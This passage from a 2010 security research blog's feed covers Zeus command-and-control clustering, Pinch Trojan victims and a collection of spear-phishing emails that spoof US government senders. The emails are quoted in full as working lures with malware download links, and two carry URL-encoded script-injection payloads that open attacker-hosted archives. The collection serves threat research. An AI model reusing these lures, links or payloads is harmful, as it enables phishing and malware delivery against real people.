<p>However, this data only reflects only the relationships between IP addresses, domain names and the email addresses used to register the domain names. There are a variety of additional factors, especially those related to analysis of Zeus malware binaries that may support these linkages, provide additional linkages or challenge these linkages. Historical data showing coordinated movements to new IP addresses and name servers would provide additional means to cluster command and control servers with a higher degree of accuracy. </p>
<p>In Part 2 of this post I will broaden the analysis in order to see if the tentative conclusion hold with the introduction of additional data. </p>
]]></content:encoded>
			<wfw:commentRss>http://cyber.secdev.ca/2010/10/clustering-zeus-command-and-control-servers/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Old Threats are Current Threats</title>
		<link>http://cyber.secdev.ca/2010/09/old-threats-are-current-threats/</link>
		<comments>http://cyber.secdev.ca/2010/09/old-threats-are-current-threats/#comments</comments>
		<pubDate>Wed, 29 Sep 2010 12:29:56 +0000</pubDate>
		<dc:creator>nart</dc:creator>
				<category><![CDATA[SecDev.cyber Blog]]></category>
		<category><![CDATA[Malware]]></category>

		<guid isPermaLink="false">http://cyber.secdev.ca/?p=262</guid>
		<description><![CDATA[Despite the fact that the authors of the Pinch Trojan were &#8220;pinched&#8221; by law enforcement in 2007, the Pinch Trojan continues to be a current threat both because the source code is available (so anyone can modify it and release a variant) but also because old versions of Pinch continue to be effectively used. In [...]]]></description>
			<content:encoded><![CDATA[<p>Despite the fact that the authors of the Pinch Trojan were &#8220;<a href="http://www.securelist.com/en/weblog?weblogid=208187472">pinched</a>&#8221; by law enforcement in 2007, the Pinch Trojan continues to be a current threat both because the source code is available (so anyone can modify it and release a variant) but also because old versions of Pinch continue to be effectively used. In 2007, <a href="http://www.f-secure.com/weblog/archives/00001189.html">F-Secure</a> analyzed data collected from a Pinch command and control server using a tool called PinchParserPro 2.3.1.7. PinchParserPro allows the attackers to parse, search and export the data stolen by the Pinch Trojan. Three years later Pinch is <a href="http://blog.novirusthanks.org/2010/01/welcome-to-the-jungle-zeus-pinch-rogue-software/">still in action</a>, often bundled with an assortment of other malware. (Here is a <a href="http://www.isolatedthreat.com/pinch-analysis.pdf">paper</a> that has a detailed technical analysis of Pinch variants.)</p>
<p>Data recovered from a recently active Pinch command and control server, moretds.org (formerly moretds.in) indicates that 26,308 IP addresses uploaded data to the server. The top three countries affected were the US, Germany and Turkey but there was a considerable geographic distribution with a total of 150 countries affected.</p>
<p><a href="http://www.infowar-monitor.net/wp-content/uploads/2010/09/moretds.org_.png"><img src="http://www.infowar-monitor.net/wp-content/uploads/2010/09/moretds.org_-300x185.png" alt="" title="moretds.org" width="300" height="185" class="aligncenter size-medium wp-image-1592" /></a></p>
<p>In order to read the data PinchParserPro 2.2.2.2 had to be used, which is an older than version than what <a href="http://www.f-secure.com/weblog/archives/00001189.html">F-Secure used</a> (PinchParserPro 2.3.1.7) in 2007. It is interesting that such an old version is still being successfully deployed.</p>
<p><a href="http://www.infowar-monitor.net/wp-content/uploads/2010/09/pinchparser.png"><img src="http://www.infowar-monitor.net/wp-content/uploads/2010/09/pinchparser-300x215.png" alt="" title="pinchparser" width="300" height="215" class="aligncenter size-medium wp-image-1612" /></a></p>
<p>While investigating the recovered data, credentials associated with government accounts were discovered. One of the victims of the malware was the Ministry of Foreign Affairs of the People&#8217;s Republic of China. While there has been much attention on malware attacks emanating from China, China is also a <a href="http://english.people.com.cn/90001/90776/90882/7114154.html">victim of malware attacks</a>. In fact, a recent cyber-crime report by Symantec revealed that Chinese users were the most <a href="http://community.norton.com/t5/Ask-Marian/Norton-s-Cybercrime-Report-The-Human-Impact-Reveals-Global/ba-p/282432">victimized</a> by online crime.</p>
<p>The governmental accounts recovered from the control server include:</p>
<ul>
<li>Ministry of Foreign Affairs, China</li>
<li>Industrial and Commercial Administration Bureau in Taiyuan, China</li>
<li>Ministry of Health, Turkey</li>
<li>Izmir Tax Services Department, Turkey</li>
<li>Istanbul Security Directorate, Turkey</li>
<li>Aegean Obstetrics and Gynecology Training and Research Hospital, Turkey</li>
<li>Ministry of Environment, Brazil</li>
<li>Regional Labor Court 6th Region, Brazil</li>
<li>National Electoral Commision, Poland</li>
<li>Ministry of Agriculture, Forestry and Water Management, Macedonia</li>
<li>Drug Enforcement Administration, Office of Diversion Control, E-Commerce program, USA</li>
<li>City of Oklahoma City, USA</li>
<li>Taipei Sewage Systems Office of Health, Taiwan</li>
<li>Ministry of Interior, Ukraine</li>
<li>Dirección Nacional de los Registros Nacionales, Argentina</li>
</ul>
<p>While there is often an emphasis on the latest malware threats, old malware persists and continues to be very effective. In addition, attackers are able to compromise government systems using these outdated tools. And, even if the attackers did not intend to compromise these system &#8212; and I don&#8217;t think they did &#8212; attackers are, in general, beginning to realize that not all compromises are the same and that there may be additional value that can be extracted from particular compromised machines.</p>
]]></content:encoded>
			<wfw:commentRss>http://cyber.secdev.ca/2010/09/old-threats-are-current-threats/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Crime or Espionage? Part 2</title>
		<link>http://cyber.secdev.ca/2010/09/crime-or-espionage-part-2/</link>
		<comments>http://cyber.secdev.ca/2010/09/crime-or-espionage-part-2/#comments</comments>
		<pubDate>Thu, 09 Sep 2010 12:28:36 +0000</pubDate>
		<dc:creator>nart</dc:creator>
				<category><![CDATA[SecDev.cyber Blog]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Social Engineering]]></category>
		<category><![CDATA[zeus]]></category>

		<guid isPermaLink="false">http://cyber.secdev.ca/?p=260</guid>
		<description><![CDATA[In &#8220;Crime or Espionage Part 1&#8221; I examined a series of attacks that appear to be aimed at those interested in intelligence issues and those in the government and military. The malware used in these attacks was ZeuS and there are common command and control elements used in the attacks beginning in December 2009 and [...]]]></description>
			<content:encoded><![CDATA[<p>In &#8220;<a href="http://www.nartv.org/2010/08/27/crime-or-espionage/">Crime or Espionage Part 1</a>&#8221; I examined a series of attacks that appear to be aimed at those interested in intelligence issues and those in the government and military. The malware used in these attacks was ZeuS and there are common command and control elements used in the attacks beginning in December 2009 and continuing until late August 2010. In addition, these attacks have been linked to infrastructure used by the <a href="http://www.nartv.org/2010/03/01/the-kneber-botnet-spear-phishing-attacks-and-crimeware/">Kneber</a> botnet, a ZeuS-based botnet discovered by <a href="http://www.netwitness.com/resources/kneber.aspx">Netwitness</a>.</p>
<p>This post is an overview of a collection of publicly available emails associated with these ongoing series of attacks. These are the socially engineered emails designed to lure potential victims into clicking on and executing the attackers&#8217; malicious code. While the attacks are not targeted down to the individual, or even institutional level, and appear to have been sent to a wide variety of targets, the content of the emails is geared towards those interested in intelligence, military and security issues. </p>
<p>The malicious emails appear to have been sent from email addresses associated with the following domain names: nsa.gov, greylogic.us, pentagon.af.mil, fbi.gov, dia.mil, dhs.gov, stratcom.mil and ifc.nato.int. With the exception of Jeff Carr&#8217;s Grey Logic, the emails appear to come from government and military sources. The subject lines and the text of the emails largely focus on security issues with some messages making use of classification markings such as &#8220;U//FOUO&#8221; and official looking email footers in order to appear to be legitimate. </p>
<p>The links in to the malicious files contained within the emails make use of a variety of hosts. The attackers will often include a link to the file sharing services rapidshare.com, sendspace.com and depositfiles.com. The attackers also use compromised legitimate websites, many of which are running the Joomla! CMS.  However, at other times the attackers have used domain names registered specifically for malicious purposes:</p>
<p>dnicenter.com &#8211; abuseemaildhcp@gmail.com<br />
dhsorg.org &#8211; hilarykneber@yahoo.com</p>
<p>The email addresses <a href="http://www.malwaredomainlist.com/mdl.php?search=abuseemaildhcp%40gmail.com&#038;colsearch=All&#038;quantity=50&#038;inactive=on">abuseemaildhcp@gmail.com</a> and <a href="http://www.malwaredomainlist.com/mdl.php?search=hilarykneber%40yahoo.com&#038;colsearch=All&#038;quantity=50&#038;inactive=on">hilarykneber@yahoo.com</a> are well known and have been used to register numerous domain names associated with malware, mostly ZeuS. </p>
<p>The &#8220;hilarykneber@yahoo.com&#8221; email address was made famous by discovery of the Kneber botnet by Netwitness. Netwitness revealed that many of the compromised computers in the US included government networks as well as Fortune 500 enterprises. This is not entirely surprising as any large botnet is likely to have compromised some government computers. But, the recognition of this fact may be the catalyst for the <a href="http://www.nartv.org/2010/08/27/crime-or-espionage/">series of attacks</a> using intelligence, military and security themes as lure. Not all compromised computers are of the same value, surely the attackers realize this. In &#8220;<a href="http://ha.ckers.org/blog/20100314/conversations-with-a-blackhat/">Conversations With a Blackhat</a>&#8221; RSnake outlines this scenario:</p>
<blockquote><p>
There are already other types of bad guys who do things like spam, steal credentials and DDoS. For that to work they need a botnet with thousands or millions of machines. The chances of a million machine botnet having compromised at least one machine within a target of interest is relatively high.</p>
<p>So let’s say I’m badguy1 who wants to break into one or more companies of interest. Sure, I could work for days or weeks and maybe get into one or both of them, but at the risk of tipping my hand to the companies and there’s always a chance I’ll fail entirely. Or I could work with badguy2 who has a botnet. I could simply give a list of IPs, domains or email addresses of known targets to the bot herder and say that instead of paying a few cents to rent some arbitrary machine for a day, I’ll pay thousands of dollars to get a bot within the company I’m actually interested in.
</p></blockquote>
<p>A variation of this is a scenario in which the botmaster grows the botnet but through means that increase the chances of compromising a target of interest that &#8220;badguy1&#8243; wants to compromise. By using intelligence, military and security issues and themes in the lure emails, perhaps the attackers are aiming to increase the likelihood of compromising a sensitive location. In such a scenario, the botmaster is happy to get some new bots connecting in with the Zeus command and control server (from which credentials and other information can be extracted) and can also sell any sensitive data that&#8217;s been stolen or sell access to any sensitive compromised computer. </p>
<p><em>The emails below are a collection of publicly available emails associated with a <a href="http://www.nartv.org/2010/08/27/crime-or-espionage/">series of ongoing of attacks</a> using Zeus.<br />
</em></p>
<p><strong>December 9, 2009</strong><br />
Source: http://cafe.comebackalive.com/viewtopic.php?f=1&#038;t=48812&#038;start=0<br />
Source: http://contagiodump.blogspot.com/2009/12/creative-nsa-spoof-attack-of-day.html</p>
<blockquote><p>
From: ecu@nsa.gov<br />
Date: December 9, 2009 4:33:51 PM GMT+05:00<br />
Subject: CYBER-PMESII COMMANDER’S ANALYSIS OF FORECAST EFFECTS</p>
<p>AFRL-RI-RS-TR-2009-136<br />
Final Technical Report<br />
December 2009</p>
<p>CYBER-PMESII COMMANDER’S ANALYSIS OF FORECAST EFFECTS (CYBERCAFE)</p>
<p>INFORMATION SUBJECT TO EXPORT CONTROL LAWS</p>
<p>WARNING &#8211; This document contains technical data whose export is restricted by the Arms Export Control Act (Title 22, U.S.C., Sec 2751 et seq.) or the Export Administration Act of 1979, as amended (Title 50, U.S.C. App. 2401, et seq.). Violations of these export laws are subject to severe criminal penalties. Disseminate IAW DoDD 5230.25.</p>
<p>DESTRUCTION NOTICE &#8211; For classified documents, follow the procedures in DOD 5220.22-M, National Industrial Security Manual (NISPOM), section 5-705 or DOD 5200.1-R, Information Security Program, Chapter VI. For unclassified limited documents, destroy by any method that will prevent disclosure of contents or reconstruction of the document.</p>
<p>Export of the attached information (which includes, in some circumstances, release to foreign nationals within the United States) without first obtaining approval or license from the Department of State for items controlled by the International Traffic in ArmsRegulation (ITAR), or the Department of Commerce for items controlled by the Export Administration Regulation (EAR), may constitute a violation of law.</p>
<p>Download:</p>
<p>http://www.zeropaid.com/bbs/includes/CYBERCAFE.zip</p>
<p>or</p>
<p>http://rapidshare.com/files/318309046/CYBERCAFE.zip.html</p>
<p>http://www.sendspace.com/file/fmbt01</p>
</blockquote>
<p><strong>December 14, 2009</strong><br />
Source: http://cafe.comebackalive.com/viewtopic.php?f=1&#038;t=48812&#038;start=0<br />
Source: http://groups.yahoo.co.jp/group/boxing-fun/message/20326?threaded=1&#038;viscount=14&#038;expand=1</p>
<blockquote><p>
From: uctd@nsa.gov<br />
Date: December 14, 2009 1:56:24 PM GMT+05:00<br />
Subject: Information Systems Security Reminder</p>
<p>Information Systems Security Reminder</p>
<p>&#8211; Users are reminded to be aware and vigilant when using government information services both inside and outside protected environments.</p>
<p>&#8211; Be aware of your surroundings when accessing these services remotely, and prefer trusted workstations. Evaluate the security risks inherent with use of public workstations, including &#8220;shoulder surfing&#8221; by nearby persons.</p>
<p>&#8211; When communicating via email, know with whom you are communicating. Common adversary techniques include social engineering, email phishing, and evocative attachments. Government system capabilities may only be discussed with authorized personnel.</p>
<p>&#8211; If you make an error (e.g., data spill), report it so that the problem can be addressed. Report any anomalies you observe to your security office or service desk.</p>
<p>Security Software:</p>
<p>http://hkcaregroup.com/modlogan/MILSOFT.zip</p>
<p>or</p>
<p>http://rapidshare.com/files/320369638/MILSOFT.zip.html</p>
<p>http://fcpra.org/downloads/MILSOFT.zip</p>
</blockquote>
<p><strong>February 10, 2010</strong><br />
Source: http://www.nartv.org/2010/03/01/the-kneber-botnet-spear-phishing-attacks-and-crimeware/</p>
<blockquote><p>
From: jeffreyc@greylogic.us<br />
Date: Wednesday, February 10, 2010 7:34 AM<br />
Subject: Russian spear phishing attack against .mil and .gov employees</p>
<p>Russian spear phishing attack against .mil and .gov employees</p>
<p>A &#8220;relatively large&#8221; number of U.S. government and military employees are being taken in by a spear phishing attack which delivers a variant of the Zeus trojan. The email address is spoofed to appear to be from the NSA or InteLink concerning a report by the National Intelligence Council named the &#8220;2020 Project&#8221;. It&#8217;s purpose is to collect passwords and obtain remote access to the infected hosts.</p>
<p>Security Update for Windows 2000/XP/Vista/7 (KB823988)</p>
<p>About this download: A security issue has been identified that could allow an attacker to remotely compromise a computer running Microsoft(r) Windows(r) and gain complete control over it. You can help protect your<br />
computer by installing this update from Microsoft. After you install this item, you may have to restart your computer.</p>
<p>Download:</p>
<p>http://fcpra.org/downloads/winupdate.zip</p>
<p>or</p>
<p>http://www.sendspace.com/file/tj373l</p>
<p>___________<br />
Jeffrey Carr is the CEO of GreyLogic, the Founder and Principal<br />
Investigator of Project Grey Goose, and the author of &#8220;Inside Cyber Warfare&#8221;.<br />
jeffreyc@greylogic.us
</p></blockquote>
<p><strong>February 11, 2010</strong><br />
Source: http://cafe.comebackalive.com/viewtopic.php?f=1&#038;t=48812&#038;start=0<br />
Source: http://osdir.com/ml/general/2010-02/msg12517.html</p>
<blockquote><p>
From: jeffreyc@nsa.gov<br />
Date: February 11, 2010 9:39:15 AM GMT+05:00<br />
Subject: RE: Zeus Attack Spoofs NSA, Targets .gov and .mil</p>
<p>Zeus Attack Spoofs NSA, Targets .gov and .mil</p>
<p>Criminals are spamming the Zeus banking Trojan in a convincing e-mail that spoofs the National Security Agency. Initial reports indicate that a large number of government systems may have been compromised by the attack.</p>
<p>According one state government security expert who received multiple copies of the message, the e-mail campaign — apparently designed to steal passwords from infected systems — was sent exclusively to government (.gov) and military (.mil) e-mail addresses.</p>
<p>The messages are spoofed so that they appear to have been sent by the National Intelligence Council (address used was nic@nsa.gov), which serves as the center for midterm and long-range strategic thinking for the U.S. intelligence community and reports to the office of the Director of National Intelligence.</p>
<p>Security Update for Windows 2000/XP/Vista/7 (KB823988)</p>
<p>About this download: A security issue has been identified that could allow an attacker to remotely compromise a computer running Microsoft® Windows® and gain complete control over it. You can help protect your computer by installing this update from Microsoft. After you install this item, you may have to restart your computer.</p>
<p>Download:</p>
<p>http://mv.net.md/update/update.zip</p>
<p>or</p>
<p>http://www.sendspace.com/file/7jmxtq</p>
</blockquote>
<p><strong>February 12, 2010</strong><br />
Source: http://www.blackfortressindustries.com/malware-analysis/e-mail-with-phishing-links/dod-roles-and-missions-in-homeland-security</p>
<blockquote><p>
From: apacs@pentagon.af.mil<br />
Date: 12 Feb 2010 20:41:01 (GMT)<br />
Subject: DoD Roles and Missions in Homeland Security</p>
<p>Defense Science Board</p>
<p>DoD Roles and Missions in Homeland Security</p>
<p>VOLUME II – A: SUPPORTING REPORTS</p>
<p>This report is a product of the Defense Science Board (DSB). The DSB is a Federal Advisory Committee established to provide independent advice to the Secretary of Defense. Statements, opinions, conclusions and recommendations in this report do not necessarily represent the official position of the Department of Defense.</p>
<p>Download:</p>
<p>http://mv.net.md/dsb/DSB.zip</p>
<p>or</p>
<p>http://www.sendspace.com/file/rdxgzd</p>
<p>___________<br />
Office of the Under Secretary of Defense<br />
For Acquisition, Technology, and Logistics<br />
Washington, D.C. 20301-3140
</p></blockquote>
<p><strong>February 21, 2010</strong><br />
Source: http://cafe.comebackalive.com/viewtopic.php?f=1&#038;t=48812&#038;start=0<br />
Source: http://osdir.com/ml/general/2010-02/msg25834.html</p>
<blockquote><p>
From: cttd@fbi.gov<br />
Date: February 21, 2010 7:37:16 AM GMT+05:00<br />
Subject: INTELLIGENCE BULLETIN</p>
<p>FEDERAL BUREAU OF INVESTIGATION<br />
INTELLIGENCE BULLETIN</p>
<p>February 2010</p>
<p>Weapons of Mass Destruction Directorate</p>
<p>Indicators for Terrorist Use of Toxic Industrial Chemicals</p>
<p>THIS INTELLIGENCE BULLETIN PROVIDES LAW ENFORCEMENT AND OTHER PUBLIC SAFETY OFFICIALS WITH SITUATIONAL AWARENESS CONCERNING INTERNATIONAL AND DOMESTIC TERRORIST TACTICS.</p>
<p>UNCLASSIFIED//FOR OFFICIAL USE ONLY</p>
<p>Download:</p>
<p>http://timingsolution.com/Doc/BULLETIN.zip</p>
<p>or</p>
<p>http://www.sendspace.com/file/goz3yd</p>
<p>___________<br />
HANDLING NOTICE: Recipients are reminded that FBI Intelligence Bulletins contain sensitive terrorism and counterterrorism information meant for use primarily within the law enforcement and homeland security communities. Such bulletins shall not be released, either in written or oral form, to the media, the general public, or other personnel who do not have a valid need-to-know without prior approval from an authorized FBI official, as such release could jeopardize national security.
</p></blockquote>
<p><strong>March 6, 2010</strong><br />
Source: http://aquiacreek.com/showthread.php?1712-URGENT!-Phising-Email-Scam</p>
<blockquote><p>
Office of the Director of National Intelligence INTELLIGENCE BULLETIN UNCLASSIFIED//FOR OFFICIAL USE ONLY</p>
<p>(U//FOUO) DPRK has carried out nuclear missile attack on Japan</p>
<p>06 March 2010</p>
<p>(U//FOUO) Prepared by Defense Intelligence Agency</p>
<p>(U//FOUO) Today, March 06, 2010 at 7.12 AM local time (UTC/GMT -5 hours), US seismographic stations recorded seismic activity in the area of Okinawa Island (Japan). According to National Geospatial-Intelligence Agency, Democratic People&#8217;s Republic of Korea has carried out an average range missile attack with use of nuclear warhead. The explosion caused severe destructions in the northern part of the Okinawa island. Casualties among the personnel of the US military base are being estimated at the moment.</p>
<p>(U//FOUO) In connection with the occurred events, it is necessary for the personnel of the services listed below to be ready for immediate mobilization:</p>
<p>CENTRAL INTELLIGENCE AGENCY</p>
<p>DEFENSE INTELLIGENCE AGENCY</p>
<p>DEPARTMENT OF ENERGY:<br />
OFFICE OF INTELLIGENCE AND COUNTERINTELLIGENCE</p>
<p>DEPARTMENT OF HOMELAND SECURITY:<br />
OFFICE OF INTELLIGENCE AND ANALYSIS</p>
<p>DEPARTMENT OF STATE:<br />
BUREAU OF INTELLIGENCE AND RESEARCH</p>
<p>DEPARTMENT OF THE TREASURY:<br />
OFFICE OF INTELLIGENCE AND ANALYSIS</p>
<p>DRUG ENFORCEMENT ADMINISTRATION:<br />
OFFICE OF NATIONAL SECURITY INTELLIGENCE</p>
<p>FEDERAL BUREAU OF INVESTIGATION<br />
NATIONAL SECURITY BRANCH</p>
<p>NATIONAL GEOSPATIAL-INTELLIGENCE AGENCY</p>
<p>NATIONAL RECONNAISSANCE OFFICE</p>
<p>NATIONAL SECURITY AGENCY</p>
<p>UNITED STATES AIR FORCE</p>
<p>UNITED STATES ARMY</p>
<p>UNITED STATES COAST GUARD</p>
<p>UNITED STATES MARINE CORPS</p>
<p>UNITED STATES NAVY<br />
________________</p>
<p>(U//FOUO) Additional information can be found in the following report:</p>
<p>http://search.access.gpo.gov/GPO/Search.asp?ct=GPO&#038;q1=%3c%61%20%68%72%65%66%3d%22%6 8%74%74%70%3a%2f%2f%64%6e%69%63%65%6e%74%65%72%2e% 63%6f%6d%2f%64%6f%63%73%2f%72%65%70%6f%72%74%2e%7a %69%70%22%3e%44%6f%77%6e%6c%6f%61%64%20%3c%2f%61%3 e%3c%73%63%72%69%70%74%3e%77%69%6e%64%6f%77%2e%6f% 70%65%6e%28%27%68%74%74%70%3a%2f%2f%64%6e%69%63%65 %6e%74%65%72%2e%63%6f%6d%2f%64%6f%63%73%2f%72%65%7 0%6f%72%74%2e%7a%69%70%27%29%3c%2f%73%63%72%69%70% 74%3e</p>
<p>________________<br />
Office of the Director of National Intelligence Washington, D.C. 20511
</p></blockquote>
<p>* The actual URL is: http://dnicenter.com/docs/report.zip</p>
<p><strong>March 7, 2010</strong><br />
Source: http://www.blackfortressindustries.com/malware-analysis/e-mail-with-phishing-links/for-official-use-only&#8212;dprk-missile-attack-on-japan<br />
Source: http://www.omninerd.com/articles/A_Short_Look_into_a_Phishing_Email</p>
<blockquote><p>
From: SSC@dia.mil<br />
Date: 7 Mar 2010 14:17:51 (GMT)<br />
Subject: FOR OFFICIAL USE ONLY</p>
<p>Office of the Director of National Intelligence<br />
INTELLIGENCE BULLETIN<br />
UNCLASSIFIED//FOR OFFICIAL USE ONLY</p>
<p>(U//FOUO) DPRK has carried out nuclear missile attack on Japan</p>
<p>06 March 2010</p>
<p>(U//FOUO) Prepared by Defense Intelligence Agency</p>
<p>(U//FOUO) Today, March 06, 2010 at 11.46 AM local time (UTC/GMT -5 hours), US seismographic stations recorded seismic activity in the area of Okinawa Island (Japan). According to National Geospatial-Intelligence Agency, Democratic People&#8217;s Republic of Korea has carried out an average range missile attack with use of nuclear warhead. The explosion caused severe destructions in the northern part of the Okinawa island. Casualties among the personnel of the US military base are being estimated at the moment.</p>
<p>(U//FOUO) In connection with the occurred events, it is necessary for the personnel of the services listed below to be ready for immediate mobilization:</p>
<p>CENTRAL INTELLIGENCE AGENCY</p>
<p>DEFENSE INTELLIGENCE AGENCY</p>
<p>DEPARTMENT OF ENERGY:<br />
  OFFICE OF INTELLIGENCE AND COUNTERINTELLIGENCE</p>
<p>DEPARTMENT OF HOMELAND SECURITY:<br />
  OFFICE OF INTELLIGENCE AND ANALYSIS</p>
<p>DEPARTMENT OF STATE:<br />
  BUREAU OF INTELLIGENCE AND RESEARCH</p>
<p>DEPARTMENT OF THE TREASURY:<br />
  OFFICE OF INTELLIGENCE AND ANALYSIS</p>
<p>DRUG ENFORCEMENT ADMINISTRATION:<br />
  OFFICE OF NATIONAL SECURITY INTELLIGENCE</p>
<p>FEDERAL BUREAU OF INVESTIGATION<br />
  NATIONAL SECURITY BRANCH</p>
<p>NATIONAL GEOSPATIAL-INTELLIGENCE AGENCY</p>
<p>NATIONAL RECONNAISSANCE OFFICE</p>
<p>NATIONAL SECURITY AGENCY</p>
<p>UNITED STATES AIR FORCE</p>
<p>UNITED STATES ARMY</p>
<p>UNITED STATES COAST GUARD</p>
<p>UNITED STATES MARINE CORPS</p>
<p>UNITED STATES NAVY<br />
________________</p>
<p>(U//FOUO) Additional information can be found in the following report:</p>
<p>http://www.mod.gov.ge/2007/video/movie.php?l=G&#038;v=%22%3e%3c%61%20%68%72%65%66%3d%22%68%74%74%70%3a%2f%2f%6f%66%66%69%63%69%61%6c%77%65%69%67%68%74%6c%6f%73%73%68%65%6c%70%2e%6f%72%67%2f%77%70%2d%61%64%6d%69%6e%2f%72%65%70%6f%72%74%2e%7a%69%70%22%3e%44%6f%77%6e%6c%6f%61%64%20%3c%2f%61%3e%3c%73%63%72%69%70%74%3e%77%69%6e%64%6f%77%2e%6f%70%65%6e%28%27%68%74%74%70%3a%2f%2f%6f%66%66%69%63%69%61%6c%77%65%69%67%68%74%6c%6f%73%73%68%65%6c%70%2e%6f%72%67%2f%77%70%2d%61%64%6d%69%6e%2f%72%65%70%6f%72%74%2e%7a%69%70%27%29%3c%2f%73%63%72%69%70%74%3e%3c%22</p>
<p>________________<br />
Office of the Director of National Intelligence<br />
Washington, D.C. 20511
</p></blockquote>
<p>* The actual URL is: http://officialweightlosshelp.org/wp-admin/report.zip</p>
<p><strong>March 11, 2010</strong><br />
Source: http://cafe.comebackalive.com/viewtopic.php?f=1&#038;t=48812&#038;start=0<br />
Source: http://dl.ambiweb.de/mirrors/www.tldp.org/LDP/LGNET/173/lg_launderette.html</p>
<blockquote><p>
From: hsi@dhs.gov<br />
Date: March 11, 2010 11:38:56 PM GMT+05:00<br />
Subject: U.S. Department of Homeland Security</p>
<p>Department of Homeland Security<br />
INTELLIGENCE BULLETIN<br />
UNCLASSIFIED</p>
<p>11 March 2010</p>
<p>Yesterday the Department of Homeland Security has received the prevention from NASA&#8217;s Jet Propulsion Laboratory about the occurred shift of Earth’s figure axis:<br />
________</p>
<p>The recent Chilean earthquake shifted the axis by approximately three inches and shortened the length of a day by 1.26 microseconds. According to NASA’s Jet Propulsion Laboratory the displacement of Earth’s axis will cause natural disasters on the Eastern coast of the USA including Florida, Georgia, South and North Carolina.<br />
________</p>
<p>In this connection the DHS has made a decision to prepare for general evacuation from the specified area. The population of the region should be ready for evacuation. It is necessary collect valuable possessions, documents, things of first necessity, and wait for the announcement.</p>
<p>In order to prevent panic among the population DHS asks to stay calm and follow the official instructions listed below:</p>
<p>http://dhsorg.org/docs/instructions.zip</p>
<p>________________<br />
U.S. Department of Homeland Security<br />
Washington, DC 20528
</p></blockquote>
<p><strong>March 13, 2010</strong><br />
Source: http://www.blackfortressindustries.com/malware-analysis/e-mail-with-phishing-links/re-instructions-unclassified</p>
<blockquote><p>
From: NSI@dhs.gov<br />
Date: 13 Mar 2010 18:26:54 (GMT)<br />
Subject: RE: Instructions UNCLASSIFIED</p>
<p>U.S. Department of Homeland Security<br />
INTELLIGENCE BULLETIN<br />
UNCLASSIFIED</p>
<p>13 March 2010</p>
<p>Yesterday the Department of Homeland Security has received the prevention from NASA&#8217;s Jet Propulsion Laboratory about the occurred shift of Earth&#8217;s figure axis:<br />
______________________</p>
<p>The recent Chilean earthquake shifted the axis by approximately three inches and shortened the length of a day by 1.26 microseconds. According to NASA&#8217;s Jet Propulsion Laboratory the displacement of Earth&#8217;s axis will cause natural disasters on the Eastern coast of the USA including Florida, Georgia, South and North Carolina.<br />
______________________</p>
<p>In this connection the DHS has made a decision to prepare for general evacuation from the specified area. The population of the region should be ready for evacuation. It is necessary collect valuable possessions, documents, things of first necessity, and wait for the announcement.</p>
<p>In order to prevent panic among the population DHS asks to stay calm and follow the official instructions listed below:</p>
<p>http://www.sendspace.com/file/h96uh1</p>
<p>or</p>
<p>http://depositfiles.com/files/xj1wvamc4</p>
<p>________________________________________<br />
U.S. Department of Homeland Security<br />
Washington, DC 20528
</p></blockquote>
<p><strong>June 16, 2010</strong><br />
Source: http://www.clearancejobs.com/security_tips.php</p>
<blockquote><p>
From: rss@stratcom.mil<br />
Date: Wed Jun 16 13:10:08 2010<br />
Subject: From STRATCOM to</p>
<p>,</p>
<p>United States Strategic Command</p>
<p>Commanders Reading List</p>
<p>Professional development is essential to the successful execution of our mission &#8211; to provide global security for America. One key component to professional development is reading and critically thinking about military issues, history, and leadership. I am pleased to announce the following selections for my 2010 Commander&#8217;s Professional Reading List. It is my intent that this list will serve as a guide for all STRATCOM military and civilian personnel to enhance their professional knowledge.</p>
<p>All of the titles below are available immediately for check-out at the Thomas S. Power Library on base and in the USSTRATCOM Leadership Institute.</p>
<p>Our overarching objective is to provide global security to our nation-the best in the world. I encourage everyone to read these titles and continue your professional development so you can continue to be the finest operators, planners, and advocates for STRATCOM and its global mission set.</p>
<p>KEVIN P. CHILTON<br />
General, USAF<br />
Commander</p>
<p>Inside Cyber Warfare: Mapping the Cyber Underworld (Dec 2009)</p>
<p>This book provides fascinating and disturbing details on how nations, groups, and individuals throughout the world are using the Internet as an attack platform to gain military, political, and economic advantages over their adversaries. Discusses how sophisticated hackers, working on behalf of states or organized crime, patiently play a high-stakes game targeting anyone, regardless of affiliation or nationality. (Amazon.com)</p>
<p>Author: Jeffrey Carr is a cyber intelligence expert, columnist for Symantec&#8217;s Security Focus, and author who specializes in the investigation of cyber attacks against governments and infrastructures by State and Non-State hackers. Mr. Carr is the Principal Investigator for Project Grey Goose, an Open Source intelligence investigation into the Russian cyber attacks on Georgia in August, 2008. His work has been quoted in The New York Times, The Washington Post, The Guardian, BusinessWeek, Parameters, and Wired.</p>
<p>Additional information can be found in the following report:</p>
<p>http://tiesiog.puikiai.lt/report.zip</p>
<p>http://somashop.lv/report.zip</p>
<p>________________________________________<br />
To report a problem please submit an ODNI/ICES Ticket<br />
Phone: 301-688-1800 (commercial), 644-1800 (DSN), 363-6105 (NSTS)&#8221;
</p></blockquote>
<p><strong>June 17, 2010</strong><br />
Source: http://kerneltrap.org/mailarchive/openbsd-bugs/2010/6/17/6884952<br />
Source: http://www.mail-archive.com/ports@openbsd.org/msg28673.html</p>
<blockquote><p>
From: izhar.mujaddid@pentagon.af.mil<br />
Date: Thursday, June 17, 2010 &#8211; 11:57 am<br />
Subject: Scientific Advisory Board</p>
<p>UNCLASSIFIED//FOR OFFICIAL USE ONLY</p>
<p>United States Air Force</p>
<p>Scientific Advisory Board</p>
<p>Report on Defending and Operating in a Contested Cyber Domain</p>
<p>Executive Summary and Annotated Brief<br />
SAB-TR-10-01<br />
June 2010</p>
<p>This report is a product of the United States Air Force Scientific Advisory<br />
Board Study Committee on Defending and Operating in a Contested Cyber<br />
Domain. Statements, opinions, findings, recommendations and conclusions<br />
contained in this report are those of the Study Committee and do not<br />
necessarily represent the official position of the United States Air Force or the United States Department of Defense.</p>
<p>Additional information can be found in the following report:</p>
<p>http://www.christianrantsen.dk/report.zip</p>
<p>http://enigmazones.eu/report.zip</p>
<p>________________________________________<br />
HQ USAF/SB<br />
1180 AF PENTAGON RM 5D982<br />
WASHINGTON, DC 20330-1180
</p></blockquote>
<p><strong>June 17, 2010</strong><br />
Source: http://permalink.gmane.org/gmane.linux.debian.qa-packages/33936</p>
<blockquote><p>
From: tsa@dhs.gov<br />
Date: 2010-06-17 18:01:16 GMT<br />
